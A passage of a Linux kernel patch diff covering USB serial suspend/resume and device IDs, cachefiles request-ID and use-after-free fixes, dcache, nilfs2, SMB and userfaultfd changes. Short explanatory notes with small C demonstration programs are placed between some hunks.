+ 			usb_hcd_resume_root_hub(hcd);
+ 		}
+ 	}
++done:
+ 	/*
+ 	 * If system is subject to the Quirk, Compliance Mode Timer needs to
+ 	 * be re-initialized Always after a system resume. Ports are subject
+diff --git a/drivers/usb/serial/mos7840.c b/drivers/usb/serial/mos7840.c
+index 6b12bb4648b83..26f287180f8ab 100644
+--- a/drivers/usb/serial/mos7840.c
++++ b/drivers/usb/serial/mos7840.c
+@@ -1736,6 +1736,49 @@ static void mos7840_port_remove(struct usb_serial_port *port)
+ 	kfree(mos7840_port);
+ }
+ 
++static int mos7840_suspend(struct usb_serial *serial, pm_message_t message)
++{
++	struct moschip_port *mos7840_port;
++	struct usb_serial_port *port;
++	int i;
++
++	for (i = 0; i < serial->num_ports; ++i) {
++		port = serial->port[i];
++		if (!tty_port_initialized(&port->port))
++			continue;
++
++		mos7840_port = usb_get_serial_port_data(port);
++
++		usb_kill_urb(mos7840_port->read_urb);
++		mos7840_port->read_urb_busy = false;
++	}
++
++	return 0;
++}
++
++static int mos7840_resume(struct usb_serial *serial)
++{
++	struct moschip_port *mos7840_port;
++	struct usb_serial_port *port;
++	int res;
++	int i;
++
++	for (i = 0; i < serial->num_ports; ++i) {
++		port = serial->port[i];
++		if (!tty_port_initialized(&port->port))
++			continue;
++
++		mos7840_port = usb_get_serial_port_data(port);
++
++		mos7840_port->read_urb_busy = true;
++		res = usb_submit_urb(mos7840_port->read_urb, GFP_NOIO);
++		if (res)
++			mos7840_port->read_urb_busy = false;
++	}
++
++	return 0;
++}
++
+ static struct usb_serial_driver moschip7840_4port_device = {
+ 	.driver = {
+ 		   .owner = THIS_MODULE,
+@@ -1763,6 +1806,8 @@ static struct usb_serial_driver moschip7840_4port_device = {
+ 	.port_probe = mos7840_port_probe,
+ 	.port_remove = mos7840_port_remove,
+ 	.read_bulk_callback = mos7840_bulk_in_callback,
++	.suspend = mos7840_suspend,
++	.resume = mos7840_resume,
+ };
+ 
+ static struct usb_serial_driver * const serial_drivers[] = {
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index b5ee8518fcc78..cb0eb7fd25426 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -1425,6 +1425,10 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = NCTRL(0) | RSVD(1) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1901, 0xff),	/* Telit LN940 (MBIM) */
+ 	  .driver_info = NCTRL(0) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x3000, 0xff),	/* Telit FN912 */
++	  .driver_info = RSVD(0) | NCTRL(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x3001, 0xff),	/* Telit FN912 */
++	  .driver_info = RSVD(0) | NCTRL(2) | RSVD(3) | RSVD(4) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x7010, 0xff),	/* Telit LE910-S1 (RNDIS) */
+ 	  .driver_info = NCTRL(2) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x7011, 0xff),	/* Telit LE910-S1 (ECM) */
+@@ -1433,6 +1437,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = NCTRL(2) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x701b, 0xff),	/* Telit LE910R1 (ECM) */
+ 	  .driver_info = NCTRL(2) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x9000, 0xff),	/* Telit generic core-dump device */
++	  .driver_info = NCTRL(0) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, 0x9010),				/* Telit SBL FN980 flashing device */
+ 	  .driver_info = NCTRL(0) | ZLP },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, 0x9200),				/* Telit LE910S1 flashing device */
+@@ -2224,6 +2230,10 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_7106_2COM, 0x02, 0x02, 0x01) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_DC_4COM2, 0xff, 0x02, 0x01) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_DC_4COM2, 0xff, 0x00, 0x00) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 0x7126, 0xff, 0x00, 0x00),
++	  .driver_info = NCTRL(2) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 0x7127, 0xff, 0x00, 0x00),
++	  .driver_info = NCTRL(2) | NCTRL(3) | NCTRL(4) },
+ 	{ USB_DEVICE(CELLIENT_VENDOR_ID, CELLIENT_PRODUCT_MEN200) },
+ 	{ USB_DEVICE(CELLIENT_VENDOR_ID, CELLIENT_PRODUCT_MPL200),
+ 	  .driver_info = RSVD(1) | RSVD(4) },
+@@ -2284,6 +2294,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(3) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0f0, 0xff),			/* Foxconn T99W373 MBIM */
+ 	  .driver_info = RSVD(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe145, 0xff),			/* Foxconn T99W651 RNDIS */
++	  .driver_info = RSVD(5) | RSVD(6) },
+ 	{ USB_DEVICE(0x1508, 0x1001),						/* Fibocom NL668 (IOT version) */
+ 	  .driver_info = RSVD(4) | RSVD(5) | RSVD(6) },
+ 	{ USB_DEVICE(0x1782, 0x4d10) },						/* Fibocom L610 (AT mode) */
+@@ -2321,6 +2333,32 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(4) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x33f8, 0x0115, 0xff),			/* Rolling RW135-GL (laptop MBIM) */
+ 	  .driver_info = RSVD(5) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x33f8, 0x0802, 0xff),			/* Rolling RW350-GL (laptop MBIM) */
++	  .driver_info = RSVD(5) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0100, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WWD for Global */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0100, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0100, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0101, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WRD for Global SKU */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0101, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0101, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0106, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WRD for China SKU */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0106, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0106, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0111, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WWD for SA */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0111, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0111, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0112, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WWD for EU */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0112, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0112, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0113, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WWD for NA */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0113, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0113, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0115, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WWD for China EDU */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0115, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0115, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0116, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WWD for Global EDU */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0116, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0116, 0xff, 0xff, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(OPPO_VENDOR_ID, OPPO_PRODUCT_R11, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x40) },
+diff --git a/fs/cachefiles/daemon.c b/fs/cachefiles/daemon.c
+index b9945e4f697be..89b11336a8369 100644
+--- a/fs/cachefiles/daemon.c
++++ b/fs/cachefiles/daemon.c
+@@ -357,14 +357,24 @@ static __poll_t cachefiles_daemon_poll(struct file *file,
+ 					   struct poll_table_struct *poll)
+ {
+ 	struct cachefiles_cache *cache = file->private_data;
++	XA_STATE(xas, &cache->reqs, 0);
++	struct cachefiles_req *req;
+ 	__poll_t mask;
+ 
+ 	poll_wait(file, &cache->daemon_pollwq, poll);
+ 	mask = 0;
+ 
+ 	if (cachefiles_in_ondemand_mode(cache)) {
+-		if (!xa_empty(&cache->reqs))
+-			mask |= EPOLLIN;
++		if (!xa_empty(&cache->reqs)) {
++			xas_lock(&xas);
++			xas_for_each_marked(&xas, req, ULONG_MAX, CACHEFILES_REQ_NEW) {
++				if (!cachefiles_ondemand_is_reopening_read(req)) {
++					mask |= EPOLLIN;
++					break;
++				}
++			}
++			xas_unlock(&xas);
++		}
+ 	} else {
+ 		if (test_bit(CACHEFILES_STATE_CHANGED, &cache->flags))
+ 			mask |= EPOLLIN;
+diff --git a/fs/cachefiles/internal.h b/fs/cachefiles/internal.h
+index 3eea52462fc87..111ad6ecd4baf 100644
+--- a/fs/cachefiles/internal.h
++++ b/fs/cachefiles/internal.h
+@@ -48,6 +48,7 @@ enum cachefiles_object_state {
+ 	CACHEFILES_ONDEMAND_OBJSTATE_CLOSE, /* Anonymous fd closed by daemon or initial state */
+ 	CACHEFILES_ONDEMAND_OBJSTATE_OPEN, /* Anonymous fd associated with object is available */
+ 	CACHEFILES_ONDEMAND_OBJSTATE_REOPENING, /* Object that was closed and is being reopened. */
++	CACHEFILES_ONDEMAND_OBJSTATE_DROPPING, /* Object is being dropped. */
+ };
+ 
+ struct cachefiles_ondemand_info {
+@@ -128,6 +129,7 @@ struct cachefiles_cache {
+ 	unsigned long			req_id_next;
+ 	struct xarray			ondemand_ids;	/* xarray for ondemand_id allocation */
+ 	u32				ondemand_id_next;
++	u32				msg_id_next;
+ };
+ 
+ static inline bool cachefiles_in_ondemand_mode(struct cachefiles_cache *cache)
+@@ -335,6 +337,14 @@ cachefiles_ondemand_set_object_##_state(struct cachefiles_object *object) \
+ CACHEFILES_OBJECT_STATE_FUNCS(open, OPEN);
+ CACHEFILES_OBJECT_STATE_FUNCS(close, CLOSE);
+ CACHEFILES_OBJECT_STATE_FUNCS(reopening, REOPENING);
++CACHEFILES_OBJECT_STATE_FUNCS(dropping, DROPPING);
++
++static inline bool cachefiles_ondemand_is_reopening_read(struct cachefiles_req *req)
++{
++	return cachefiles_ondemand_object_is_reopening(req->object) &&
++			req->msg.opcode == CACHEFILES_OP_READ;
++}
++
+ #else
+ static inline ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ 					char __user *_buffer, size_t buflen)
+@@ -365,6 +375,11 @@ static inline int cachefiles_ondemand_init_obj_info(struct cachefiles_object *ob
+ static inline void cachefiles_ondemand_deinit_obj_info(struct cachefiles_object *obj)
+ {
+ }
++
++static inline bool cachefiles_ondemand_is_reopening_read(struct cachefiles_req *req)
++{
++	return false;
++}
+ #endif
+ 
+ /*
+diff --git a/fs/cachefiles/ondemand.c b/fs/cachefiles/ondemand.c
+index 4b39f0422e590..51173ab6dbd84 100644
+--- a/fs/cachefiles/ondemand.c
++++ b/fs/cachefiles/ondemand.c
+@@ -494,7 +494,8 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 		 */
+ 		xas_lock(&xas);
+ 
+-		if (test_bit(CACHEFILES_DEAD, &cache->flags)) {
++		if (test_bit(CACHEFILES_DEAD, &cache->flags) ||
++		    cachefiles_ondemand_object_is_dropping(object)) {
+ 			xas_unlock(&xas);
+ 			ret = -EIO;
+ 			goto out;
+@@ -504,20 +505,32 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 		smp_mb();
+ 
+ 		if (opcode == CACHEFILES_OP_CLOSE &&
+-			!cachefiles_ondemand_object_is_open(object)) {
++		    !cachefiles_ondemand_object_is_open(object)) {
+ 			WARN_ON_ONCE(object->ondemand->ondemand_id == 0);
+ 			xas_unlock(&xas);
+ 			ret = -EIO;
+ 			goto out;
+ 		}
+ 
+-		xas.xa_index = 0;
++		/*
++		 * Cyclically find a free xas to avoid msg_id reuse that would
++		 * cause the daemon to successfully copen a stale msg_id.
++		 */
++		xas.xa_index = cache->msg_id_next;
+ 		xas_find_marked(&xas, UINT_MAX, XA_FREE_MARK);
++		if (xas.xa_node == XAS_RESTART) {
++			xas.xa_index = 0;
++			xas_find_marked(&xas, cache->msg_id_next - 1, XA_FREE_MARK);
++		}
+ 		if (xas.xa_node == XAS_RESTART)
+ 			xas_set_err(&xas, -EBUSY);
++
+ 		xas_store(&xas, req);
+-		xas_clear_mark(&xas, XA_FREE_MARK);
+-		xas_set_mark(&xas, CACHEFILES_REQ_NEW);
++		if (xas_valid(&xas)) {
++			cache->msg_id_next = xas.xa_index + 1;
++			xas_clear_mark(&xas, XA_FREE_MARK);
++			xas_set_mark(&xas, CACHEFILES_REQ_NEW);
++		}
+ 		xas_unlock(&xas);
+ 	} while (xas_nomem(&xas, GFP_KERNEL));
+ 
+@@ -535,7 +548,8 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 	 * If error occurs after creating the anonymous fd,
+ 	 * cachefiles_ondemand_fd_release() will set object to close.
+ 	 */
+-	if (opcode == CACHEFILES_OP_OPEN)
++	if (opcode == CACHEFILES_OP_OPEN &&
++	    !cachefiles_ondemand_object_is_dropping(object))
+ 		cachefiles_ondemand_set_object_close(object);
+ 	kfree(req);
+ 	return ret;
+@@ -634,8 +648,34 @@ int cachefiles_ondemand_init_object(struct cachefiles_object *object)
+ 
+ void cachefiles_ondemand_clean_object(struct cachefiles_object *object)
+ {
++	unsigned long index;
++	struct cachefiles_req *req;
++	struct cachefiles_cache *cache;
++
++	if (!object->ondemand)
++		return;
++
+ 	cachefiles_ondemand_send_req(object, CACHEFILES_OP_CLOSE, 0,
+ 			cachefiles_ondemand_init_close_req, NULL);
++
++	if (!object->ondemand->ondemand_id)
++		return;
++
++	/* Cancel all requests for the object that is being dropped. */
++	cache = object->volume->cache;
++	xa_lock(&cache->reqs);
++	cachefiles_ondemand_set_object_dropping(object);
++	xa_for_each(&cache->reqs, index, req) {
++		if (req->object == object) {
++			req->error = -EIO;
++			complete(&req->done);
++			__xa_erase(&cache->reqs, index);
++		}
++	}
++	xa_unlock(&cache->reqs);
++
++	/* Wait for ondemand_object_worker() to finish to avoid UAF. */
++	cancel_work_sync(&object->ondemand->ondemand_work);
+ }
+ 
+ int cachefiles_ondemand_init_obj_info(struct cachefiles_object *object,
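The msg_id allocation above scans the xarray cyclically from
msg_id_next and wraps to index 0 before giving up, so a just-freed id
is not handed out again immediately. The same idea over a plain array,
as a runnable sketch (the fixed-size table stands in for the xarray):

#include <stdbool.h>
#include <stdio.h>

#define NSLOTS 8

static bool used[NSLOTS];
static unsigned int next_id;		/* cache->msg_id_next in the patch */

static int alloc_id_cyclic(void)
{
	unsigned int n;

	for (n = 0; n < NSLOTS; n++) {
		unsigned int id = (next_id + n) % NSLOTS;

		if (!used[id]) {
			used[id] = true;
			next_id = id + 1;	/* resume after the winner */
			return (int)id;
		}
	}
	return -1;				/* -EBUSY in the patch */
}

int main(void)
{
	int i;

	for (i = 0; i < 4; i++)
		printf("got %d\n", alloc_id_cyclic());
	used[1] = false;			/* free an early id */
	printf("next: %d\n", alloc_id_cyclic());	/* 4, not the stale 1 */
	return 0;
}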
+diff --git a/fs/cachefiles/xattr.c b/fs/cachefiles/xattr.c
+index 00b087c14995a..0ecfc9065047c 100644
+--- a/fs/cachefiles/xattr.c
++++ b/fs/cachefiles/xattr.c
+@@ -110,9 +110,11 @@ int cachefiles_check_auxdata(struct cachefiles_object *object, struct file *file
+ 	if (xlen == 0)
+ 		xlen = vfs_getxattr(&init_user_ns, dentry, cachefiles_xattr_cache, buf, tlen);
+ 	if (xlen != tlen) {
+-		if (xlen < 0)
++		if (xlen < 0) {
++			ret = xlen;
+ 			trace_cachefiles_vfs_error(object, file_inode(file), xlen,
+ 						   cachefiles_trace_getxattr_error);
++		}
+ 		if (xlen == -EIO)
+ 			cachefiles_io_error_obj(
+ 				object,
+@@ -252,6 +254,7 @@ int cachefiles_check_volume_xattr(struct cachefiles_volume *volume)
+ 		xlen = vfs_getxattr(&init_user_ns, dentry, cachefiles_xattr_cache, buf, len);
+ 	if (xlen != len) {
+ 		if (xlen < 0) {
++			ret = xlen;
+ 			trace_cachefiles_vfs_error(NULL, d_inode(dentry), xlen,
+ 						   cachefiles_trace_getxattr_error);
+ 			if (xlen == -EIO)
+diff --git a/fs/dcache.c b/fs/dcache.c
+index b09bc88dbbec7..04f32dc8d1ad8 100644
+--- a/fs/dcache.c
++++ b/fs/dcache.c
+@@ -356,7 +356,11 @@ static inline void __d_clear_type_and_inode(struct dentry *dentry)
+ 	flags &= ~(DCACHE_ENTRY_TYPE | DCACHE_FALLTHRU);
+ 	WRITE_ONCE(dentry->d_flags, flags);
+ 	dentry->d_inode = NULL;
+-	if (dentry->d_flags & DCACHE_LRU_LIST)
++	/*
++	 * The negative counter only tracks dentries on the LRU. Don't inc if
++	 * d_lru is on another list.
++	 */
++	if ((flags & (DCACHE_LRU_LIST|DCACHE_SHRINK_LIST)) == DCACHE_LRU_LIST)
+ 		this_cpu_inc(nr_dentry_negative);
+ }
+ 
+@@ -2001,9 +2005,11 @@ static void __d_instantiate(struct dentry *dentry, struct inode *inode)
+ 
+ 	spin_lock(&dentry->d_lock);
+ 	/*
+-	 * Decrement negative dentry count if it was in the LRU list.
++	 * The negative counter only tracks dentries on the LRU. Don't dec if
++	 * d_lru is on another list.
+ 	 */
+-	if (dentry->d_flags & DCACHE_LRU_LIST)
++	if ((dentry->d_flags &
++	     (DCACHE_LRU_LIST|DCACHE_SHRINK_LIST)) == DCACHE_LRU_LIST)
+ 		this_cpu_dec(nr_dentry_negative);
+ 	hlist_add_head(&dentry->d_u.d_alias, &inode->i_dentry);
+ 	raw_write_seqcount_begin(&dentry->d_seq);
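Both dcache hunks guard nr_dentry_negative with the same predicate:
the counter moves only when DCACHE_LRU_LIST is set and
DCACHE_SHRINK_LIST is clear, i.e. when d_lru really is on the LRU. A
truth-table check of that expression (flag values illustrative, not
the kernel's):

#include <stdio.h>

#define DCACHE_LRU_LIST    0x1	/* illustrative bit positions */
#define DCACHE_SHRINK_LIST 0x2

static int counts_as_lru(unsigned int flags)
{
	return (flags & (DCACHE_LRU_LIST | DCACHE_SHRINK_LIST)) ==
	       DCACHE_LRU_LIST;
}

int main(void)
{
	unsigned int f;

	for (f = 0; f < 4; f++)
		printf("lru=%u shrink=%u -> %d\n",
		       f & 1, (f >> 1) & 1, counts_as_lru(f));
	return 0;
}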
+diff --git a/fs/locks.c b/fs/locks.c
+index 7d0918b8fe5d6..c23bcfe9b0fdd 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -1298,9 +1298,9 @@ static int posix_lock_inode(struct inode *inode, struct file_lock *request,
+ 		locks_wake_up_blocks(left);
+ 	}
+  out:
++	trace_posix_lock_inode(inode, request, error);
+ 	spin_unlock(&ctx->flc_lock);
+ 	percpu_up_read(&file_rwsem);
+-	trace_posix_lock_inode(inode, request, error);
+ 	/*
+ 	 * Free any unused locks.
+ 	 */
+diff --git a/fs/nilfs2/dir.c b/fs/nilfs2/dir.c
+index 4bba1970ad333..36438834a0c73 100644
+--- a/fs/nilfs2/dir.c
++++ b/fs/nilfs2/dir.c
+@@ -396,11 +396,39 @@ nilfs_find_entry(struct inode *dir, const struct qstr *qstr,
+ 
+ struct nilfs_dir_entry *nilfs_dotdot(struct inode *dir, struct page **p)
+ {
+-	struct nilfs_dir_entry *de = nilfs_get_page(dir, 0, p);
++	struct page *page;
++	struct nilfs_dir_entry *de, *next_de;
++	size_t limit;
++	char *msg;
+ 
++	de = nilfs_get_page(dir, 0, &page);
+ 	if (IS_ERR(de))
+ 		return NULL;
+-	return nilfs_next_entry(de);
++
++	limit = nilfs_last_byte(dir, 0);  /* is a multiple of chunk size */
++	if (unlikely(!limit || le64_to_cpu(de->inode) != dir->i_ino ||
++		     !nilfs_match(1, ".", de))) {
++		msg = "missing '.'";
++		goto fail;
++	}
++
++	next_de = nilfs_next_entry(de);
++	/*
++	 * If "next_de" has not reached the end of the chunk, there is
++	 * at least one more record.  Check whether it matches "..".
++	 */
++	if (unlikely((char *)next_de == (char *)de + nilfs_chunk_size(dir) ||
++		     !nilfs_match(2, "..", next_de))) {
++		msg = "missing '..'";
++		goto fail;
++	}
++	*p = page;
++	return next_de;
++
++fail:
++	nilfs_error(dir->i_sb, "directory #%lu %s", dir->i_ino, msg);
++	nilfs_put_page(page);
++	return NULL;
+ }
+ 
+ ino_t nilfs_inode_by_name(struct inode *dir, const struct qstr *qstr)
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index e5a72f9c793ef..1564febd1439f 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -1837,8 +1837,8 @@ require use of the stronger protocol */
+ #define   CIFSSEC_MUST_SEAL	0x40040 /* not supported yet */
+ #define   CIFSSEC_MUST_NTLMSSP	0x80080 /* raw ntlmssp with ntlmv2 */
+ 
+-#define   CIFSSEC_DEF (CIFSSEC_MAY_SIGN | CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_NTLMSSP)
+-#define   CIFSSEC_MAX (CIFSSEC_MUST_NTLMV2)
++#define   CIFSSEC_DEF (CIFSSEC_MAY_SIGN | CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_NTLMSSP | CIFSSEC_MAY_SEAL)
++#define   CIFSSEC_MAX (CIFSSEC_MAY_SIGN | CIFSSEC_MUST_KRB5 | CIFSSEC_MAY_SEAL)
+ #define   CIFSSEC_AUTH_MASK (CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_KRB5 | CIFSSEC_MAY_NTLMSSP)
+ /*
+  *****************************************************************
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 34d88425434ab..6344bc81736c0 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -2062,15 +2062,22 @@ int smb2_tree_connect(struct ksmbd_work *work)
+  * @access:		file access flags
+  * @disposition:	file disposition flags
+  * @may_flags:		set with MAY_ flags
++ * @is_dir:		is creating open flags for directory
+  *
+  * Return:      file open flags
+  */
+ static int smb2_create_open_flags(bool file_present, __le32 access,
+ 				  __le32 disposition,
+-				  int *may_flags)
++				  int *may_flags,
++				  bool is_dir)
+ {
+ 	int oflags = O_NONBLOCK | O_LARGEFILE;
+ 
++	if (is_dir) {
++		access &= ~FILE_WRITE_DESIRE_ACCESS_LE;
++		ksmbd_debug(SMB, "Discard write access to a directory\n");
++	}
++
+ 	if (access & FILE_READ_DESIRED_ACCESS_LE &&
+ 	    access & FILE_WRITE_DESIRE_ACCESS_LE) {
+ 		oflags |= O_RDWR;
+@@ -2983,7 +2990,9 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	open_flags = smb2_create_open_flags(file_present, daccess,
+ 					    req->CreateDisposition,
+-					    &may_flags);
++					    &may_flags,
++		req->CreateOptions & FILE_DIRECTORY_FILE_LE ||
++		(file_present && S_ISDIR(d_inode(path.dentry)->i_mode)));
+ 
+ 	if (!test_tree_conn_flag(tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+ 		if (open_flags & (O_CREAT | O_TRUNC)) {
+diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
+index 154c103eca751..82101a2cf933e 100644
+--- a/fs/userfaultfd.c
++++ b/fs/userfaultfd.c
+@@ -1968,7 +1968,7 @@ static int userfaultfd_api(struct userfaultfd_ctx *ctx,
+ 		goto out;
+ 	features = uffdio_api.features;
+ 	ret = -EINVAL;
+-	if (uffdio_api.api != UFFD_API || (features & ~UFFD_API_FEATURES))
++	if (uffdio_api.api != UFFD_API)
+ 		goto err_out;
+ 	ret = -EPERM;
+ 	if ((features & UFFD_FEATURE_EVENT_FORK) && !capable(CAP_SYS_PTRACE))
+@@ -1985,6 +1985,11 @@ static int userfaultfd_api(struct userfaultfd_ctx *ctx,
+ #ifndef CONFIG_PTE_MARKER_UFFD_WP
+ 	uffdio_api.features &= ~UFFD_FEATURE_WP_HUGETLBFS_SHMEM;
+ #endif
++
++	ret = -EINVAL;
++	if (features & ~uffdio_api.features)
++		goto err_out;
++
+ 	uffdio_api.ioctls = UFFD_API_IOCTLS;
+ 	ret = -EFAULT;
+ 	if (copy_to_user(buf, &uffdio_api, sizeof(uffdio_api)))
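The userfaultfd hunk moves the feature validation after the kernel has
masked out features this configuration lacks, so requesting an
unavailable feature now fails with -EINVAL instead of being silently
dropped. A minimal model of that negotiation order:

#include <errno.h>
#include <stdio.h>

#define FEAT_A 0x1
#define FEAT_B 0x2	/* assume compiled out in this configuration */

static int negotiate(unsigned int requested, unsigned int *granted)
{
	unsigned int supported = FEAT_A | FEAT_B;

	supported &= ~FEAT_B;		/* trim to what is really available */
	if (requested & ~supported)
		return -EINVAL;		/* caller asked for something we lack */
	*granted = requested;
	return 0;
}

int main(void)
{
	unsigned int g;

	printf("A only: %d\n", negotiate(FEAT_A, &g));
	printf("A+B:    %d\n", negotiate(FEAT_A | FEAT_B, &g));
	return 0;
}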
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 1ca1902af23e9..6b18b8da025f9 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -1777,6 +1777,8 @@ struct bpf_prog *bpf_prog_get_curr_or_next(u32 *id);
+ void *bpf_map_kmalloc_node(const struct bpf_map *map, size_t size, gfp_t flags,
+ 			   int node);
+ void *bpf_map_kzalloc(const struct bpf_map *map, size_t size, gfp_t flags);
++void *bpf_map_kvcalloc(struct bpf_map *map, size_t n, size_t size,
++		       gfp_t flags);
+ void __percpu *bpf_map_alloc_percpu(const struct bpf_map *map, size_t size,
+ 				    size_t align, gfp_t flags);
+ #else
+@@ -1793,6 +1795,12 @@ bpf_map_kzalloc(const struct bpf_map *map, size_t size, gfp_t flags)
+ 	return kzalloc(size, flags);
+ }
+ 
++static inline void *
++bpf_map_kvcalloc(struct bpf_map *map, size_t n, size_t size, gfp_t flags)
++{
++	return kvcalloc(n, size, flags);
++}
++
+ static inline void __percpu *
+ bpf_map_alloc_percpu(const struct bpf_map *map, size_t size, size_t align,
+ 		     gfp_t flags)
+diff --git a/include/linux/bpf_local_storage.h b/include/linux/bpf_local_storage.h
+index 7ea18d4da84b8..6d37a40cd90e8 100644
+--- a/include/linux/bpf_local_storage.h
++++ b/include/linux/bpf_local_storage.h
+@@ -116,21 +116,22 @@ static struct bpf_local_storage_cache name = {			\
+ 	.idx_lock = __SPIN_LOCK_UNLOCKED(name.idx_lock),	\
+ }
+ 
+-u16 bpf_local_storage_cache_idx_get(struct bpf_local_storage_cache *cache);
+-void bpf_local_storage_cache_idx_free(struct bpf_local_storage_cache *cache,
+-				      u16 idx);
+-
+ /* Helper functions for bpf_local_storage */
+ int bpf_local_storage_map_alloc_check(union bpf_attr *attr);
+ 
+-struct bpf_local_storage_map *bpf_local_storage_map_alloc(union bpf_attr *attr);
++struct bpf_map *
++bpf_local_storage_map_alloc(union bpf_attr *attr,
++			    struct bpf_local_storage_cache *cache);
+ 
+ struct bpf_local_storage_data *
+ bpf_local_storage_lookup(struct bpf_local_storage *local_storage,
+ 			 struct bpf_local_storage_map *smap,
+ 			 bool cacheit_lockit);
+ 
+-void bpf_local_storage_map_free(struct bpf_local_storage_map *smap,
++bool bpf_local_storage_unlink_nolock(struct bpf_local_storage *local_storage);
++
++void bpf_local_storage_map_free(struct bpf_map *map,
++				struct bpf_local_storage_cache *cache,
